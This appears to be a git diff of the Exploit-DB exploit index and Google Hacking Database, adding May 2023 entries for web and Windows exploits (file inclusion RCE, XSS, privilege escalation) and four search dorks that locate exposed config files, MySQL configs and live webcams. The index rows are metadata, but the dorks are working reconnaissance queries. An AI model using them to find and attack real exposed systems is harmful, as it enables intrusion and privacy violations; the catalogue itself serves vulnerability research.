@@ -28035,6 +28045,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31229,exploits/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,webapps,php,,2008-02-18,2014-01-28,1,CVE-2008-5584;OSVDB-42376,,,,,https://www.securityfocus.com/bid/27857/info 35424,exploits/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",webapps,php,,2014-12-16,2014-12-16,0,OSVDB-116469;CVE-2014-9567,,,,http://www.exploit-db.comProjectSend-r561.zip, 50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",2021-08-30,"Abdullah Kala",webapps,php,,2021-08-30,2021-08-30,0,,,,,, +51400,exploits/php/webapps/51400.txt,"projectSend r1605 - Private file download",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,, 51238,exploits/php/webapps/51238.txt,"projectSend r1605 - Remote Code Exectution RCE",2023-04-05,"Mirabbas Ağalarov",webapps,php,,2023-04-05,2023-04-05,0,,,,,, 35582,exploits/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,webapps,php,80,2014-12-19,2014-12-27,0,CVE-2014-1155;CVE-2011-3713;CVE-2014-9580,,,,http://www.exploit-db.comProjectSend-r561.zip, 36303,exploits/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",webapps,php,80,2015-03-06,2015-03-06,0,OSVDB-119169;CVE-2015-2564,,,,http://www.exploit-db.comProjectSend-r561.zip, 
@@ -28566,6 +28577,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 43821,exploits/php/webapps/43821.txt,"ReviewPost < 2.84 - Multiple Vulnerabilities",2015-01-02,"GulfTech Security",webapps,php,,2018-01-19,2018-01-19,0,GTSA-00060;CVE-2005-0270;CVE-2005-0271;CVE-2005-0272,,,,,http://gulftech.org/advisories/ReviewPost%20Multiple%20Vulnerabilities/60 41939,exploits/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",webapps,php,,2017-04-26,2017-04-26,0,,,,,http://www.exploit-db.comrevive-adserver-4.0.1.zip, 47739,exploits/php/webapps/47739.php,"Revive Adserver 4.2 - Remote Code Execution",2019-12-03,crlf,webapps,php,,2019-12-03,2019-12-03,0,CVE-2019-5434,,,,http://www.exploit-db.comrevive-adserver-4.2.0.tar.gz, +51401,exploits/php/webapps/51401.txt,"revive-adserver v5.4.1 - Cross-Site Scripting (XSS)",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,, 5677,exploits/php/webapps/5677.py,"RevokeBB 1.0 RC11 - 'Search' SQL Injection",2008-05-27,The:Paradox,webapps,php,,2008-05-26,2016-12-02,1,OSVDB-46454;CVE-2008-2778,,,,http://www.exploit-db.comRevokeBB_RC11_webinstall.zip, 4020,exploits/php/webapps/4020.php,"RevokeBB 1.0 RC4 - Blind SQL Injection / Hash Retrieve",2007-06-01,BlackHawk,webapps,php,,2007-05-31,2016-10-05,1,OSVDB-38366;CVE-2007-3051,,,,http://www.exploit-db.comRevokeBB_1_0_RC3.zip, 12726,exploits/php/webapps/12726.txt,"REvolution 10.02 - Cross-Site Request Forgery",2010-05-24,"High-Tech Bridge SA",webapps,php,,2010-05-23,,0,OSVDB-64679,,,,,http://www.htbridge.ch/advisory/xsrf_csrf_in_npds_revolution.html 
@@ -29062,6 +29074,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 5960,exploits/php/webapps/5960.txt,"SePortal 2.4 - 'poll_id' SQL Injection",2008-06-27,Mr.SQL,webapps,php,,2008-06-26,2016-12-09,1,OSVDB-46567;CVE-2008-5191;OSVDB-46566,,,,, 18222,exploits/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection (1)",2011-12-09,Don,webapps,php,,2011-12-09,2016-12-14,0,OSVDB-77591,,,,http://www.exploit-db.comseportal2.5.zip, 51373,exploits/php/webapps/51373.txt,"Serendipity 2.4.0 - Cross-Site Scripting (XSS)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,, +51403,exploits/php/webapps/51403.txt,"Serendipity 2.4.0 - File Inclusion RCE",2023-05-02,nu11secur1ty,webapps,php,,2023-05-02,2023-05-02,0,,,,,, 51372,exploits/php/webapps/51372.txt,"Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,, 35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php,,2014-11-12,2014-11-12,0,OSVDB-114661;OSVDB-114660,,,,, 45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comServerZilla_src.zip, 
@@ -29764,6 +29777,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 28780,exploits/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 - 'Grid3.lib.php' Remote File Inclusion",2006-10-10,k1tk4t,webapps,php,,2006-10-10,2013-10-07,1,,,,,,https://www.securityfocus.com/bid/20442/info 2520,exploits/php/webapps/2520.txt,"Softerra PHP Developer Library 1.5.3 - Remote File Inclusion",2006-10-12,MP,webapps,php,,2006-10-11,2017-10-07,1,OSVDB-29623;CVE-2006-5472;OSVDB-29622;OSVDB-29621,,,,http://www.exploit-db.comPHPLibrary-1.5.3.zip,http://pastebin.com/r7LCdeTC 3600,exploits/php/webapps/3600.txt,"Softerra Time-Assistant 6.2 - 'inc_dir' Remote File Inclusion",2007-03-29,K-159,webapps,php,,2007-03-28,,1,OSVDB-34626;CVE-2007-1787,,,,,http://advisories.echo.or.id/adv/adv80-K-159-2007.txt +51404,exploits/php/webapps/51404.sh,"SoftExpert (SE) Suite v2.1.3 - Local File Inclusion",2023-05-02,"Felipe Alcantara",webapps,php,,2023-05-02,2023-05-02,0,CVE-2023-30330,,,,, 44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80,2018-07-05,2018-07-05,0,,"SQL Injection (SQLi)",,,, 39189,exploits/php/webapps/39189.txt,"Softmatica SMART iPBX - Multiple SQL Injections",2014-05-19,AtT4CKxT3rR0r1ST,webapps,php,,2014-05-19,2016-01-07,1,OSVDB-107114,,,,,https://www.securityfocus.com/bid/67465/info 17209,exploits/php/webapps/17209.txt,"SoftMP3 - SQL Injection",2011-04-24,mArTi,webapps,php,,2011-04-24,2011-04-24,0,,,,,, 
@@ -39069,6 +39083,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 40995,exploits/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,local,windows,,2017-01-08,2017-01-08,1,,,,,http://www.exploit-db.comADL-Trial-Setup.zip, 46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows,,2019-03-19,2019-03-19,0,,Local,,,http://www.exploit-db.comhm1192.exe, 46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows,,2019-03-19,2019-03-19,0,,"Buffer Overflow",,,http://www.exploit-db.comhm1192.exe, +51412,exploits/windows/local/51412.txt,"Advanced Host Monitor v12.56 - Unquoted Service Path",2023-05-02,"Mr Empy",local,windows,,2023-05-02,2023-05-02,0,,,,,, 49049,exploits/windows/local/49049.txt,"Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path",2020-11-16,"Jair Amezcua",local,windows,,2020-11-16,2020-11-16,0,,,,,, 47905,exploits/windows/local/47905.txt,"Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions",2020-01-13,ZwX,local,windows,,2020-01-13,2020-04-13,1,,,,,, 35503,exploits/windows/local/35503.rb,"Advantech AdamView 4.30.003 - '.gni' Local Buffer Overflow (SEH)",2014-12-09,"Muhamad Fadzil Ramli",local,windows,,2014-12-10,2014-12-10,0,CVE-2014-8386;OSVDB-114843,,,,, 
@@ -40611,6 +40626,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 47510,exploits/windows/local/47510.txt,"Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Serive Path",2019-10-16,cakes,local,windows,,2019-10-16,2019-10-16,0,,,,,http://www.exploit-db.commikogo-starter.exe, 43033,exploits/windows/local/43033.py,"Mikogo 5.4.1.160608 - Local Credentials Disclosure",2017-10-23,LiquidWorm,local,windows,,2017-10-24,2017-10-24,0,,,,,, 50558,exploits/windows/local/50558.txt,"MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation",2021-12-01,"Alessandro Salzano",local,windows,,2021-12-01,2021-12-01,0,,,,,, +51410,exploits/windows/local/51410.txt,"MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control",2023-05-02,"Andrea Intilangelo",local,windows,,2023-05-02,2023-05-02,0,CVE-2023-25438,,,,, 9618,exploits/windows/local/9618.py,"Millenium MP3 Studio - '.pls' / '.mpf' / '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-09,hack4love,local,windows,,2009-09-08,,1,OSVDB-56574,,,,http://www.exploit-db.commillennium1.exe, 9298,exploits/windows/local/9298.pl,"Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (2)",2009-07-30,corelanc0d3r,local,windows,,2009-07-29,,1,,,,,, 11191,exploits/windows/local/11191.pl,"Millenium MP3 Studio 1.x - '.m3u' Local Stack Overflow",2010-01-19,NeoCortex,local,windows,,2010-01-18,,1,,,,,http://www.exploit-db.commillennium1.exe, diff --git a/ghdb.xml b/ghdb.xml index b87553f3e..23dd00e2b 100644 --- a/ghdb.xml +++ b/ghdb.xml 
@@ -45438,6 +45438,21 @@ Author: Abhi Chitkara 2020-05-07 Alexandros Pappas + + 8174 + https://www.exploit-db.com/ghdb/8174 + Files Containing Juicy Info + intitle:"index of" "users.yml" | "admin.yml" | "config.yml" + # Google Dork: intitle:"index of" "users.yml" | "admin.yml" | "config.yml" +# Files Containing Juicy Info +# Date:02/05/2023 +# Exploit Author: Mohammed A.Siledar + Google dork submission: intitle:"index of" "users.yml" | "admin.yml" | "config.yml" + https://www.google.com/search?q=Google dork submission: intitle:"index of" "users.yml" | "admin.yml" | "config.yml" + + 2023-05-02 + Mohammed A.Siledar + 6176 https://www.exploit-db.com/ghdb/6176 @@ -48397,6 +48412,21 @@ It contains key username and password text sensitive information. 2021-10-25 Ramjan Ali Sabber + + 8171 + https://www.exploit-db.com/ghdb/8171 + Files Containing Juicy Info + intitle:index.of conf.mysql + # Google Dork: intitle:index.of conf.mysql +# Files Containing Juicy Info +# Date:02/05/2023 +# Exploit Author: Ramjan Ali Sabber + Re: GHDB Dork + https://www.google.com/search?q=Re: GHDB Dork + + 2023-05-02 + Ramjan Ali Sabber + 111 https://www.exploit-db.com/ghdb/111 @@ -48651,6 +48681,21 @@ Author: Lord.TMR 2023-01-31 Insha Ahsan Raj + + 8173 + https://www.exploit-db.com/ghdb/8173 + Files Containing Juicy Info + inurl: "/wp-content/uploads" + # Google Dork: inurl: "/wp-content/uploads" +# Files Containing Juicy Info +# Date:02/05/2023 +# Exploit Author: Andrew Gimenez + inurl: "/wp-content/uploads" + https://www.google.com/search?q=inurl: "/wp-content/uploads" + + 2023-05-02 + Andrew Gimenez + 8115 https://www.exploit-db.com/ghdb/8115 
@@ -101600,6 +101645,21 @@ Website: (https://the-infosec.com) 2018-12-17 Alfie + + 8172 + https://www.exploit-db.com/ghdb/8172 + Various Online Devices + intitle: "webcam" site: "live" + # Google Dork: intitle: "webcam" site: "live" +# Various Online Devices +# Date:02/05/2023 +# Exploit Author: Ramjan Ali Sabber + Re: GHDB - Dork + https://www.google.com/search?q=Re: GHDB - Dork + + 2023-05-02 + Ramjan Ali Sabber + 7599 https://www.exploit-db.com/ghdb/7599